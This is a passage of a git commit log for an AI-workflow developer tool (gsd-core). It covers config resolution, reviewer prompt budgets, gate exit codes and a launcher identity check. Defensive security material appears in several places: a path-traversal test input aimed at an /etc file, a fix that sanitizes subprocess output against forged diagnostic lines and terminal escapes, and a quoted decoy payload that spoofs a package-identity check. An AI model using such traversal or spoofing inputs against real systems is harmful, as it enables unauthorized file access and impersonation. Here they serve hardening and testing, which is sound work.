and per-entry rejection isProtected is exact string equality, so a git-flow project must enumerate every release/* and hotfix/* by name. #3552 only asked for an integration-branch field, so the implementation satisfies the letter of the issue while leaving its git-flow motivation partly unserved — say so where users will meet it rather than leaving them to discover it. Also documents the Blocker 3 behaviour change: an invalid entry is ignored with a warning naming it and the remaining names still apply. Both statements land in docs/CONFIGURATION.md and gsd-core/references/planning-config.md, and the config-field-docs parity test asserts each in both so the two cannot drift. * refactor(#3648): extract isValidProtectedBranches for cross-surface pinning The `git.protected_branches` check inside `cmdConfigSet` and the resolver's per-entry filter in `git-base-branch.cts` are deliberately different shapes — all-or-nothing on write, per-entry on read, so a hand-edited config.json cannot fail the guard open. Nothing structural keeps their two definitions of "usable branch name" in step. Lifting the write-side check into a named, exported predicate lets a property test ask both surfaces about the same value and assert they agree, which is the fast-check gap the round-2 review flagged. No behaviour change: the predicate is the same expression, called from the same place. * fix(#3648): stop --is-protected rewriting the config it is asking about `gsd_run query git.base-branch --is-protected` runs on every execute-phase and every ship. It resolved config through `loadConfig`, whose normalize-then-write path rewrites `.planning/config.json` whenever any legacy key normalizes — so a boolean question was silently editing the user's checked-in config. This PR had widened the trigger by adding a fifth normalization block (top-level `base_branch` -> `git.base_branch`), making it fire for exactly the projects the feature targets. `loadConfigResolved` gains `options.persist` (opt-OUT, default true): resolution is unchanged, only the two write-back side effects are suppressed. The predicate passes `persist: false`; the ~30 other callers are untouched, so a legacy config is still migrated by ordinary use. Asserted on BYTES rather than parsed shape, because the rewrite reorders keys and reflows whitespace even when the values are equivalent. Three tests, each with its own control: the end-to-end CLI leaves the file byte-identical while still answering `true` from the legacy key (proving the config WAS read); an ordinary persisting load of the same fixture DOES change the bytes (proving the fixture is live rather than inert); and `persist:false` vs default over one directory returns deep-equal config while differing on the write. Reverting the one-line `persist: false` fails the first of those and only that one. Also from the review: - `readEffectiveGitConfig`'s comment claimed the readFile branch routed "through the same precedence authority production uses". It does not, and cannot — it reproduces two of production's steps over a single file. The comment now names what the seam covers and what it does NOT (root/workstream deep merge, builtin and global defaults, federated merge), and the seam now applies production's flat-then-nested lookup so it stops disagreeing about a surviving flat key. - The missing-argument diagnostic promised "answering false", which the fail-closed guard on the same call can contradict by printing `true`. It now states what it did with the argument and leaves the answer to stdout. * test(#3648): re-pin block 5 on #3760's refusal contract #3767 landed on next while this PR was in review and fixed the non-object config-section defect properly: a present-but-non-object section now BLOCKS its own migration — value preserved, no Normalization pushed, refusal reported via `skipped[]` — rather than being rebuilt from a plain-object view. That supersedes this branch's round-2 `hoistLegacyKey`, which prevented the character-key spread but still dropped the section value silently, and which the round-3 review correctly called out as destruction in place of corruption. The rebase drops that commit and routes block 5 through the upstream helper. This file's tests asserted the superseded design, so they are rewritten to pin block 5 — `base_branch` -> `git.base_branch`, which did not exist when #3760's suite was written — against the contract that now governs it: ordinary hoist into an absent/null/object section, canonical-nested-wins, and refusal for each of string/number/boolean/array sections with the exact `skipped` entry. Two controls keep it from passing vacuously: the refusal must be scoped to block 5 (an unrelated block still normalizes in the same call), and a property over arbitrary `git` values asserts hoist and refusal are exhaustive AND mutually exclusive per key, that a refusal leaves both the section and the legacy key untouched, and that a hoist manufactures no index key the input did not carry. * docs(#3648): correct the Git Query and Config Loader module contracts CONTEXT.md's Git Query Module still described base-branch tier 1 as a direct `.planning/config.json` read. Since this PR it is the EFFECTIVE configuration resolved by the Config Loader — a materially different authority, carrying the root/workstream deep merge, flat-then-nested lookup and builtin/federated defaults. The `--is-protected` predicate, `git.protected_branches`, and the two invariants that distinguish the predicate from the plain query (fails closed on an unverified base; must not write) were undocumented entirely. The Config Loader entry now states that loading is not side-effect-free by default and documents `options.persist`. docs/INVENTORY.md's `git-base-branch.cjs` row carried the same stale ladder and no mention of the predicate. `node scripts/gen-inventory-manifest.cjs --write` was run and produced no diff: the manifest indexes roster NAMES, not row prose, so a description edit cannot move it. Also closes the global-defaults minor: `git.protected_branches` is inert in `~/.gsd/defaults.json`, but so is every other `git.*` key — no branch-policy key appears in `_globalBaseCfg` or `GLOBAL_DEFAULTS_RESOLUTION_KEYS`. That is section-wide and predates this PR, so the fix is to state the scope where users meet it rather than to quietly extend the resolution set for two new keys. * fix(#3648): close four defects found by the round-4 external review Two external reviewers (codex, antigravity/Gemini 3.1 Pro) were run adversarially against this branch. Four findings reproduced against source; each is fixed with a failing-first test and a control, and each fix was verified by reverting it and watching exactly the intended test fail. 1. `persist:false` was DROPPED by the workstream fallback (codex). Blocker 1 was only half closed. `loadConfigResolved` re-enters itself with a bare `{ workstream: null }` when a workstream has no config.json of its own, and that literal discarded every other option — so the recursive pass ran at the DEFAULT persistence and rewrote the ROOT config. Reproduced: with GSD_WORKSTREAM=alpha and a legacy flat `base_branch`, `--is-protected` rewrote `.planning/config.json` despite `persist:false`. Both recursions now forward `options` and override only `workstream`; the explicit override still wins the hasOwnProperty check, so spreading cannot let `workstreamContext` reintroduce a workstream. 2. Both workflow call sites failed OPEN, and aborted under `set -e` (both reviewers, independently). `IS_PROTECTED=$(gsd_run ...)` yields an empty string when the query fails, so `[ "$X" = true ]` was simply false: no warning, no trace — a silent hole in the guard whose only job is to warn. The bare assignment also aborted the step under `set -e`. Both sites now degrade VISIBLY: `|| IS_PROTECTED=""`, then an explicit empty-string arm that says the check did not run. Deliberately not fail-closed — claiming "protected" on no evidence would warn on every branch whenever gsd-tools is unavailable. 3. `isValidProtectedBranches` and the resolver disagreed on a sparse array (antigravity). `.every()` skips holes; the resolver's `for...of` yields `undefined` for them, so `["main", , "develop"]` was accepted by config-set and rejected by the resolver. The cross-surface property passed only because `fc.array` cannot generate a hole. The predicate now indexes, and the generator punches holes so that axis is actually falsifiable. JSON cannot express a hole, so this is unreachable in production — but two definitions of one predicate must not contradict each other. 4. A top-level `protected_branches` silently outranked `git.protected_branches` (antigravity). Routing the key through `get(key, {section, field})` gave it flat-then-nested precedence, which is back-compat for keys `normalizeLegacyKeys` migrates. `protected_branches` is new in #3552 and has no legacy form, so that invented an undocumented alias. It now resolves nested-only through a new `getNested`, in production and in the test seam. `base_branch` keeps flat-then-nested — it HAS a legacy spelling that #3760's refusal path can leave behind — and a control pins that distinction. Also narrows a CONTEXT.md claim this round introduced. The predicate fails closed only when a git query TIMED OUT or could not be spawned (#3057 B4's `verified`); a git command that runs and exits non-zero counts as a clean negative, so a cwd that is not a repository answers `false`, not `true`. Verified pre-existing on next @ |
||
|
|
400db94e02 |
fix(#3894): quick path honors workflow.research_before_questions; key resolves from global defaults (#4047)
* test(#3894): research_before_questions must resolve globally and order quick.md (failing first) * fix(#3894): quick path honors workflow.research_before_questions; key resolves from global defaults Two layers, one key. The quick workflow ran its discussion phase before its research phase unconditionally — neither quick.md nor its steps ever read workflow.research_before_questions, though the key is documented, schema-registered, /gsd-settings-writable, and honored by /gsd-discuss-phase and /gsd-new-project. A gray-area answer given without research is then written to <quick_id>-CONTEXT.md as a locked decision downstream agents are told not to revisit — an evidence-free choice made unfalsifiable (the reporter's #3714 misresolution). - quick.md Step 4 now carries the same research-before-questions check the two honoring paths make: when enabled, research-phase executes before discussion-phase; false/unset keeps the written order. Both sections stay section-manifest gated. - src/config-loader.cts forwarded workflow.post_planning_gaps from ~/.gsd/defaults.json but silently dropped this key — same file, same nesting, one resolved and one didn't. Now forwarded with the same flat + nested-alias fallback shape, added to the resolution-keys lockstep canary and the #3532 shadowed-warning set (nested alias reporting generalized over both keys). Emitted-Drift-Ack-Growth: quick.md — #3894: +Step 4 ordering rule (the research-before-questions check the discuss-phase and new-project paths already make); a real behavioral gate, not incidental bloat. * fix(#3894): review fold-ins — gate the CONTEXT.md reference, colon slash-forms - quick/steps/research-phase.md directed the researcher subagent to read <quick_id>-CONTEXT.md under DISCUSS_MODE with no existence hedge — but under the new ordering (research BEFORE discussion) the file cannot exist yet when the researcher is dispatched. The reference now says read-only-if-present with the #3894 reason; the alignment purpose still applies on the default ordering. - quick.md's new rule used the hyphen slash forms (/gsd-discuss-phase, /gsd-new-project); source artifacts under gsd-core/workflows must author the colon form the install-time converters key on — the same file already uses /gsd:new-project and /gsd:quick elsewhere. * docs(#3894): planning-config row names the flat CONFIG_DEFAULTS alias config-field-docs requires every CONFIG_DEFAULTS key to appear in the doc; the row documented the canonical namespaced form only. Adds the same alias sentence post_planning_gaps's row carries, plus the #3894 quick-path note. * chore(#3894): changeset fragment (pr number backfilled after PR creation) * chore(#3894): backfill changeset PR number (4047) --------- Co-authored-by: sim <sim@local> |
||
|
|
51ca9f39ba |
fix(#3801): register inline_plan_threshold in the defaults manifest and correct the docs (#4019)
* fix(#3801): register inline_plan_threshold in the defaults manifest (default 2) and correct settings-advanced * chore(#3801): changeset fragment (pr number backfilled after PR creation) * chore(#3801): backfill changeset PR number (4019) * test(#3801): parse the defaults table with the shared markdown-table parser --------- Co-authored-by: sim <sim@local> |
||
|
|
ac3668e4b7 |
fix(#3797): make the roadmapper's role, output, and checklist match its write-first execution flow (#4008)
* test(#3797): the roadmapper must follow one write-first contract * fix(#3797): make the roadmapper's role, output, and checklist match its write-first execution flow The roadmapper contradicted itself: role blurb, output format, and completion checklist described an approve-first flow while its execution flow said "Write Files Immediately" with reactive-only revision (#3797). The approval gate belongs to the ORCHESTRATOR — both callers read the written ROADMAP.md, present it, and gate on approval (with an auto-mode bypass a subagent cannot host) — so write-first is the contract. All approve-first text now describes the write-then-return reality, the old "Draft Presentation Format" (whose ## ROADMAP DRAFT header matched no orchestrator branch) is folded into the ## ROADMAP CREATED structured return as a preview block, and the duplicate checklist lines are merged. A structural guard pins the single contract. Emitted-Drift-Ack-Growth: gsd-roadmapper.md — #3797: +bytes — approve-first wording replaced with write-first descriptions; the DRAFT presentation template folded into the ROADMAP CREATED return as a preview block * chore(#3797): changeset fragment (pr number backfilled after PR creation) * chore(#3797): backfill changeset PR number (4008) --------- Co-authored-by: sim <sim@local> |
||
|
|
dd4f179672 |
feat(#3970): per-task external-tracker content-resolution seam (#4000)
* feat(#3970): per-task external-tracker content-resolution seam Implements ADR-3646 (Phase 1, #3970): a `<task tracker-id="...">` attribute plus a new optional `taskContentResolver` capability-manifest field let a capability resolve a task's action/verify/acceptance-criteria/read_first/done content from an external issue tracker instead of PLAN.md's inline body. - src/plan-document.cts: parses the `tracker-id` attribute into `PlanTask.trackerId` - src/task-content-resolution.cts: new leaf module — split/find/build/resolve, with a hard-halt (throw) contract on ambiguous/failed/timeout/malformed resolution, never a silent fallback to possibly-stale inline text - src/task-command-router.cts: new `task resolve-content --plan --task-id --raw` CLI verb wiring the module into a real process exit code - gsd-core/bin/lib/capability-validator.cjs: validates the new `taskContentResolver` manifest field (feature-role only, cross-capability trackerPrefix uniqueness) - gsd-core/workflows/execute-plan.md, gsd-core/references/loop-hook-dispatch.md, docs/reference/capability-manifest.md: wire the seam into the per-task loop and document it as a new `execute:task` point outside the existing contribution/step/gate vocabulary (unconditional in autonomous mode) Closes #3970 * fix(#3970): gate checkpoint tasks out of content resolution, close trackerPrefix grammar parity gap, cover path-traversal guard Standards/Spec code-review pass on the task-content-resolution seam (ADR-3646 Phase 1) found three defects: 1. execute-plan.md's task-content-resolution bullet fired on any tracker-id-bearing task with no check that it wasn't type="checkpoint:*", contradicting ADR-3646 Decision 1 (a checkpoint task must never enter resolve-content). plan-document.cts already parses trackerId: null unconditionally for checkpoint tasks; only the workflow prose needed the fix, so the bullet now explicitly excludes checkpoint tasks. 2. task-content-resolution.cts's parseResolverDeclaration accepted any non-empty trackerPrefix with no grammar check, while capability- validator.cjs's KEBAB_RE enforces kebab-case at install time — a Generative Fix Divergence gap. Added the same grammar (as a literal regex, documented as intentionally not shared across the .cts/.cjs build boundary) plus a parity test asserting the two surfaces agree across a valid/invalid trackerPrefix table. 3. task-command-router.cts's routeResolveContent path-traversal guard on --plan had zero test coverage. Added a test exercising a ../../../etc/passwit-shaped path and asserting the USAGE rejection names the offending path. * fix(#3970): sanitize resolver diagnostics and cap resolver timeoutMs Two findings caught by an isolated security-review pass on the task content resolution seam: - ResolverFailedError/ResolverMalformedOutputError embedded raw, unsanitized subprocess stderr/stdout (attacker/model-influenced via the tracker-id argv token) into .message. A hostile or buggy resolver could smuggle a newline plus a forged "Error: " line, or terminal escape sequences, into a diagnostic io.cjs's error() writes verbatim to stderr. Fixed at the constructor (task-content-resolution.cts) via io.cjs's existing formatDiagnosticToken(), so every caller of resolveTaskContent gets a safe .message by construction. - capability-validator.cjs's validateTaskContentResolverFields had no upper bound on taskContentResolver.invoke.timeoutMs, letting a manifest declare an effectively unbounded value and defeat the "bounded subprocess" design intent. Added a 120000ms ceiling specific to this field, without touching the shared isPositiveIntegerMs() helper (still used unbounded by the reviewer lane's timeoutFloorMs and probe timeoutMs). Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * fix(#3970): fix gsd-test failures — stale prose allowlist line and stderr-vs-message assertion gsd-test (remote dockerized matrix) came back red with 5 failures on this PR; all five are real defects, fixed here. - tests/no-bare-gsd-tools-command-position.test.cjs: PROSE_ALLOWLIST's execute-plan.md entry pointed at line 415, which ffc190df4's checkpoint-exclusion caveat (added near line 221) shifted down by one line. The actual "validated downstream by gsd-tools uat classify-coverage" descriptive mention now sits at line 416. Updated the allowlist entry's line number to match. - tests/task-command-router-resolve-content.test.cjs: the path-traversal test asserted the outside-project-scope diagnostic against the thrown ExitError's own .message. io.cts's error() (ADR-3889) writes its human-readable message to fd 2 via writeAllSync and then throws a bare `new ExitError(1)` with no message argument — by design, so the exception carries no duplicate text and the thrown ExitError's message defaults to "process exit 1" (cli-exit.cts's ExitError constructor). Root cause was the test, not the source: task-command-router.cjs's outside-project-scope rejection already calls error() correctly and the diagnostic text is genuinely emitted, just on fd 2, not on the exception. Fixed the test to capture fd-2 writes (mirroring tests/estimate-calibrate.test.cjs's runCalibrateExpectError and this same file's own captureStdout for fd 1) and assert against the captured stderr text instead of err.message. This was masked locally because a manual `node -e` sanity check that only inspects the caught exception's .message cannot see what the real node:test run actually failed on. Emitted-Drift-Ack-Growth: execute-plan.md — adds the ADR-3646 task-content-resolution bullet and checkpoint-exclusion caveat to the per-task execute loop; a real behavioral prose addition, not incidental bloat. Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com> * docs(#3970): backfill changeset PR number (pr:0 -> pr:4000) --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com> |
||
|
|
03b7125293 |
enhance(#3909): a probe that could not run no longer asserts a verdict (#3944)
* test(#3909): failing-first suite for the fabricated probe fallbacks Binds the four fabrication sites found by executing the surfaces (ADR-3889 failure class (c)), each with a positive control so an over-firing fix goes red: - the blocking api-coverage.verify-pre gate certifying "no external-API integration" from a zero-byte phase scope - the assumption-delta query route scanning an unresolvable phase section as the empty string and reporting it as an examined negative - both capability fragments' probe fallbacks, which append a fabricated verdict rather than replacing, and fire on the legitimate exit-1 negative Verification runs on the remote runner. Refs #3909 * enhance(#3909): a probe that could not run no longer asserts a verdict ADR-3889 Phase 5. Four sites turned a failed or unexamined probe into a confident negative; each now reports what it could not establish. - check api-coverage.verify-pre: a phase with no plan body and no roadmap section ran detection over zero bytes and PASSED the blocking seal gate, certifying "no external-API integration" from input it never read. It now holds with scope_unavailable. The discriminator is bytes examined, never signals found, so a phase whose plans are real and simply carry no API vocabulary passes exactly as before. - query assumption-delta scan: an unresolvable phase section was scanned as the empty string and reported as an examined negative. It now returns {skipped, reason: phase_unresolved}, still at exit 0 — an ADR-2980 degraded result in the payload, leaving the gsd-tools exit projection to P8. - both capability fragments: `|| echo '{"detected":false}'` appended rather than replaced, and fired on the legitimate exit-1 negative, so a correct answer and an honest skip both arrived as two concatenated objects. They now keep the probe's own payload and manufacture only an explicit probe_unavailable skip when the probe produced nothing at all. Every registered outcome is more restrictive on a blocking gate, so this can turn a false green red and never a red green. Docs: FEATURES 156, CONFIGURATION (both keys), references/api-coverage.md seal-time outcome table, and a new how-to for the reason-code vocabulary. Verification runs on the remote runner. Closes #3909 * test(#3909): correct the stale unknown-phase assertion `unknown phase → detected:false, no throw (graceful)` scanned phase 999 against a two-phase roadmap and asserted `detected === false`. That pinned the fabrication as intended behavior: the phase does not exist, so the detector was handed the empty string and its "no core assumption changed" answer described nothing that was ever read. It now asserts the skipped-with-reason shape. The graceful-degradation contract the test was actually protecting — the query succeeds and does not throw on an unknown phase — is unchanged. Found by code review, not by the author. Refs #3909 * docs(#3909): author the FEATURES entry in its generator source `docs/FEATURES.md` is generated by `scripts/gen-features.cjs` from the per-feature fragments in `docs/features/`. The API-coverage entry was edited in the generated file, so the next regeneration silently dropped it. The text now lives in `docs/features/api-coverage-gate.md` and `docs/FEATURES.md` is regenerated from it, leaving the shipped file byte-identical and its content actually derivable. Caught by `lint:generated-sync`. Refs #3909 * test(#3909): bind the skip to "not found", and pin the discriminator The first verification run went red on one case, and the case was wrong rather than the code. `getRoadmapPhaseWithFallback` returns `null` for an unknown phase and for a missing ROADMAP.md, but for a section whose body is whitespace-only it returns the heading line alone — which is not empty. So a body-less section WAS found, and reporting `detected:false` over its heading is a real negative, not a fabrication. The test had assumed the resolver yielded `''` there. Correcting the test rather than the resolver keeps `skipped` bound to the distinction the issue asks for — found versus not found — and avoids diverging `assumption-delta scan` from `roadmap.get-phase`, which the fragment documents as sharing one resolver. Also adds the seeded property the test matrix had promised: for any plan body, the scope read back is whitespace-only exactly when the body was. That pins the gate's discriminator to bytes examined, so it cannot quietly become "no signals found", across unicode whitespace and CRLF. `docs/INVENTORY.md` picks up the reference doc's new seal-time outcome table — surfaced by the co-change gate, not by a lint failure. Refs #3909 * chore(#3909): backfill the changeset PR number Refs #3909 --------- Co-authored-by: sim <sim@local> |
||
|
|
c5f2b94b27 |
enhance(#3907): gates report no-input instead of a verdict they never reached (#3932)
* feat(#3907): gates report no-input instead of asserting a verdict they never reached The three stdin-reading gates bound 2 to a stdin read error only, with no arm for stdin closed at zero bytes - so empty input flowed into the detector, found nothing, and exited 1, which each module's own comment defines as a negative verdict. An unset PHASE_SECTION made the UI gate assert the phase has no UI. Empty and whitespace-only input now exit NO_INPUT, and a read error exits UNAVAILABLE rather than a locally-invented 2, both resolved through the registry and delivered by terminateNow. The exit code was only half of it: under --json the same input emitted {detected:false}, byte-identical to the fabricated payload #3909 exists to fix, and the blocking coverage gate reads that payload. Empty input now emits the in-tree {skipped:true,reason} form with no detected key at all. teams-status is excluded: it never reads stdin and has no invented 2, so the four-module framing in the issue and ADR is wrong. The dead root bin/lib/ui-safety-gate.cjs is deleted - no installer reference, no workflow invocation, and the live fallback chains are for other modules. Its removal restores the unit tests to the module that actually ships; they had been asserting the stale copy's two-field shape, which is why it drifted unnoticed. * fix(#3907): drive gate tests through the process seam, and make removed-but-needed basename-precise CONTRIBUTING requires every subprocess go through tests/helpers/process-seam.cjs; two of the three gate suites hand-rolled spawnSync while the third, added in the same change, used runNode correctly for the identical injection case. Converted the blocks this change added, leaving pre-existing ones alone. Deleting one of two files sharing a basename made lint-removed-but-needed report 14 references that were all to the surviving canonical module - the false-positive class its own docstring names. It now matches on the deleted file's full path when a surviving file shares its basename, which is more precise rather than weaker: a genuine full-path reference still fails, and behaviour is unchanged when no basename collides. It immediately caught a docstring on this branch that spelled the deleted path. * test(#3907): update the one existing assertion that pinned the old empty-stdin verdict A pre-existing test asserted exit 1 on empty stdin - the defect this phase removes - and was missed because the change added new blocks without auditing existing ones pinning the old contract. Audited the rest: the other three status-1 assertions in that file all feed real input and are the genuine-negative controls that must keep returning 1, so exactly one was stale. The retired 2 is gone from the describe's contract comment too. * chore(#3907): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
fb2d122d7f |
feat(#3841): assert gsd-tools identity on every state-mutating verb (#3848)
* feat(#3841): assert gsd-tools identity before any state-mutating verb only this package publishes. The path-based branches — a project-local install, a runtime config directory — had no such guarantee; they trusted their configured location. This closes them. Mechanism: once resolution finishes, and before any verb runs, the preamble probes the tool it picked with `runtime-identity --raw` and matches the answer with a shell `case` pattern ANCHORED to the start of the compact payload (`{"packageName":"@opengsd/gsd-core"`). An unanchored substring match accepts the decoy `{"packageName":"get-shit-done-cc","note":"@opengsd/gsd-core"}`, which any colliding package could publish. The outcome is exported as the two-valued `GSD_IDENTITY_STATUS` (`ok`/`unverified`), so the gate is asserted on a VALUE rather than on warning prose. Rollout is warn-then-fail per the #3146 ruling: `unverified` prints one line naming BOTH causes and continues, because `no_identity_verb` cannot tell a foreign package from an `@opengsd/gsd-core` older than the verb, and at rollout the old-version case is the common one. The blocker was byte budget, not design. The preamble is inlined into 112 shipped files and several sat within single-digit bytes of frozen ceilings (`gsd-verifier.md` 16 bytes, `gsd-executor.md` 33, `execute-phase.md` 234); a first attempt broke five of them. What made room was collapsing the resolver's twenty near-identical `elif [ -f … ]` arms into one candidate-list helper (`_gsd_at`), which buys far more than the assertion costs. The preamble is now 2,624 bytes against 4,500 — a net 1,876 bytes SMALLER per inlined file, so every capped file moved away from its ceiling rather than toward it. No cap raised, no size-budget exception added, no override token emitted. Resolution order, every runtime-home probe, the `unset -f gsd_run` re-source fix, the fail-closed `exit 1`, and the `CLAUDE_ENV_FILE` persistence are all preserved byte-for-byte in substring terms; the snippet still begins with `_GSD_SHIM_NAME=` and still ends with `fi`, which the parity extractors anchor on. `gsd-core/references/gsd-run-resolver.md` is re-synced byte-equal. Also fixes two stale claims found in passing: CONTEXT.md and FEATURES.md both described an `[ -x ]` guard as the load-bearing re-source defense. That guard was tried and REMOVED in #3831 — it rejected the bare function name, fell through every branch, and hit `exit 1`, which kills a sourced caller's shell. `unset -f gsd_run` is the actual mechanism. Refs #3841 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#3841): pair the anchor's brace by requiring a closed identity payload The matrix went red on `tests/new-project-mvp-prompt.test.cjs` — "new-project.md has unbalanced braces: net depth 2" — plus a knock-on report from its parent `bug #1516` describe, which is the same failure counted once at the child and once at the block. Root cause: that guard (:182-189, mirroring #3784 bd53925f) walks characters and increments on `{`, decrements on `}`, with no awareness of shell quoting. It scans `new-project.md` PLUS every `new-project/steps/*.md`, and both `new-project.md` and `steps/auto-mode-config.md` carry one inlined preamble copy — hence net 2 from a snippet that was off by exactly one. The unpaired brace was the `{` inside the single-quoted `case` pattern of the identity anchor, which is correct shell and invisible to a text scanner. Fix in the snippet, not the guard. The pattern now anchors at BOTH ends: `'{"packageName":"@opengsd/gsd-core"'*'}'`. That balances 51/51 with a brace that does real work rather than a cosmetic pair — a truncated payload whose prefix matches now fails too, where before it verified. Safe for any future additive field: a JSON object's own closing brace is always the last character, whatever type the last value has, which is pinned by two negative-space tests (a nested object and an array-valued last key must both still verify). Cost: +3 bytes, against the 1,873 the resolver fold already gave back. The alternative considered and rejected was dropping the literal `{` for a `?` glob. It balances too, but weakens the anchor from "must be an opening brace" to "must be any one character", and the anchor is the entire point. Two guards added so this cannot recur silently: - runtime-launcher-parity (F0) pins brace balance at the SNIPPET, so the next edit to that pattern fails on the file it broke instead of surfacing three files downstream in a test whose name mentions neither the launcher nor this issue. It also asserts depth never goes negative, since a `}` preceding its `{` nets to zero while being unbalanced at every prefix. - runtime-identity gains behavioral truncated-payload and trailing-garbage fixtures, so the added `}` is proven load-bearing rather than merely present. Verified: snippet 51/51 braces; new-project combined net depth 0; the seven other preamble-bearing files with nonzero depth are unchanged from merged next (their own prose, not the preamble, and not in any guard's scan set); all 112 inlined copies and the resolver reference re-synced byte-equal; sync:launcher idempotent on the second run. Refs #3841 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#3841): backfill changeset PR number Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Opus 5 <noreply@anthropic.com> |
||
|
|
63abcface9 |
feat(#3146): resolve gsd_run so workflows cannot reach a foreign gsd-tools (#3831)
* feat(#3146): resolve gsd_run so workflows cannot reach a foreign gsd-tools The predecessor package get-shit-done-cc publishes a colliding gsd-tools bin whose phases.clear DELETES where this package's ARCHIVES, and both print success-shaped output against a gitignored .planning/ -- which is how #3129 cost a user 43 phase directories with no error and nothing recoverable from git. The launcher's PATH branch now resolves gsd_run, published only by this package and self-locating via its own symlink chain to the sibling shim, instead of the colliding gsd-tools. A foreign handler becomes unreachable from PATH, and when no gsd_run is reachable the resolver fails closed rather than falling back -- that fallback was the vulnerability. This is smaller than the branch it replaces, which matters: the preamble is inlined into 113 shipped files and agents/gsd-verifier.md sits 2 bytes under a red-line size cap. unset -f gsd_run leads the preamble so a re-source is idempotent. Without it, command -v finds the shell function, returns a bare name, and the resolver falls through to an exit 1 that kills a sourced caller's shell. Adds gsd-tools runtime-identity, a manual diagnostic reporting this runtime's package coordinates over the baked package-identity (#498) and readHostVersion, with a strict total classifier: only a JSON object with an exact packageName verifies, since JSON.parse admits 0/"str"/[]/null/true. An inlined identity assertion was built and reviewed first, then withdrawn -- it breaks five frozen size ceilings and no assertion fits in 2 bytes. Closes #3146 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#3146): stop sync:launcher relocating a deliberate preamble placement Pre-existing defect, surfaced by this PR because sync is a no-op unless the snippet content actually changes. transformFile inserts the preamble into the first block that CALLS gsd_run, but gsd-core/workflows/explore.md deliberately places it in a bootstrap-only block that DEFINES gsd_run without calling it -- its own comment explains why: declining the research offer must not leave Step 5's commit call unbootstrapped. Stripping empties that block of calls, so the preamble migrated forward and broke the define-before-use invariant tests/explore-command.test.cjs pins. Reproduced on a pristine origin/next checkout with the base snippet and base file, so this was not introduced here. The insertion target now honours a block that already carried the preamble, falling back to the first calling block for files that have none yet. Adds a behavioral regression test over a two-block fixture. Also updates three runtime-launcher-parity tests that pinned the removed PATH fallback to gsd-tools. Their intent is preserved -- the PATH stub is renamed gsd_run so it is reachable by the new resolver, and the RUNTIME_DIR-wins test still asserts the stub is never invoked. Fixture shebangs move to an absolute /bin/sh, because the fixture PATH is deliberately restricted and #!/usr/bin/env sh could not resolve. Refs #3146 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#3146): backfill changeset PR number Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * docs(#3146): document the FEATURES.md section-numbering practice The monotonically increasing section number in docs/FEATURES.md is the most frequent merge-conflict source in this repo, and it has TWO conflict cells, not one: the ### N. heading and the hand-maintained table of contents. Two PRs adding differently numbered features still collide on the TOC, so renumbering alone does not make a branch safe. This branch alone was renumbered 165 -> 166 -> 167 -> 168 across successive rebases. Adds a CONTRIBUTING section stating the practice: allocate the number last, never pre-emptively renumber, take max+1 after a rebase and update the TOC in the same commit, and never renumber someone else's section. Fork contributors are told explicitly they may leave the number to a maintainer at merge rather than chasing the counter. Agents are told to lease the allocation and to include the file in their published touched set. Records the durable fix as planned rather than pretending it exists: FEATURES.md should be generated from per-feature fragments the way CHANGELOG.md is generated from .changeset/, and the way tests/emitted-drift-acks/ works (#2914). Also renumbers this branch's own section to 168, leaving 167 to the PR already in flight. Refs #3146 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Opus 5 <noreply@anthropic.com> |
||
|
|
aaf47c5fc2 |
fix(#3691): let every reviewer lane take a prompt cap, and make the documented global resolve (#3832)
* test(#3691): failing-first coverage for the reviewer prompt budget No prompt cap can reach any CLI reviewer lane, by any configuration. Two independent defects compound: all nine `transport: spawn` lanes declare `promptBudgetKey: null`, so `budgetFor` returns on its first line; and the documented global `review.max_prompt_tokens` is advertised in the schema manifest but declared nowhere, so the resolver never materializes it and `budgetFor`'s fallback is dead code. Adds to tests/reviewer-config-federation.test.cjs, which already owns the per-reviewer budget config-set/config-get idiom: - a CLI lane inherits the global cap (RED: reports null) - an http lane with the -1 sentinel inherits the global cap (RED: reports null) - the resolved review surface carries max_prompt_tokens at all (RED: absent) - per-lane overrides the global on a CLI lane - the sentinel boundary: -1 inherits, 0 means do-not-trim and must NOT read as unset, 1 is the smallest real budget — the regression budgetFor's own comment warns about - anti-tightening pins that must stay green: an empty config leaves every lane null, the three existing budgeted lanes are unchanged, and config-set still rejects a per-reviewer key naming something that is not a declared lane - a fast-check property over the resolution contract itself, with -1, 0 and non-finite inputs generated explicitly rather than left to chance Every row was reproduced by hand against the real CLI before being written, so the RED/GREEN split is observed rather than predicted. Refs #3691 * fix(#3691): let every reviewer lane take a prompt cap, and make the global resolve No prompt cap could reach any CLI reviewer lane, by any configuration. Two independent defects compounded. The nine spawn-transport lanes — claude, coderabbit, antigravity, cursor, gemini, codex, kimi-code, opencode, qwen — declared `promptBudgetKey: null`, so `budgetFor` returned on its first line and `review-lane plan` reported `promptBudget: null` no matter what was configured. Each now declares `review.max_prompt_tokens_per_reviewer.<slug>` with the same `-1`-is-unset sentinel the three local-server lanes already use. Separately, the central `review.max_prompt_tokens` was listed in the schema manifest's validKeys and documented as a supported setting, but declared nowhere — the resolved surface is built from capability declarations plus the defaults manifest, and neither carried it. `configGet` returned undefined and `budgetFor`'s documented fallback was dead code. It is now declared with a `null` default, exactly as docs/CONFIGURATION.md already specified, so the default behavior is unchanged: nothing configured means nothing trims. Two things the diagnosis had not predicted, found and fixed while implementing: - `REVIEWER_LANES` in src/review-lane-descriptor.cts is a second, hardcoded registration site that `mergeReviewerLanes` prefers over the capability registry on a slug collision. Editing only the capability files left every CLI lane still null. Both sites now agree. - The generated `gsd-core/bin/lib/capability-registry.cjs` was stale and masked the capability edits; regenerated with `npm run gen:capability-registry` rather than hand-edited. docs/CONFIGURATION.md said "Only lanes that declare a budget key accept one — today ollama, lm_studio and llama_cpp". That is false as of this change and is corrected rather than left to rot. The trim-versus-refuse question the issue raises is deliberately not taken up here: the refusal path already exists for the case that matters — a reviewer 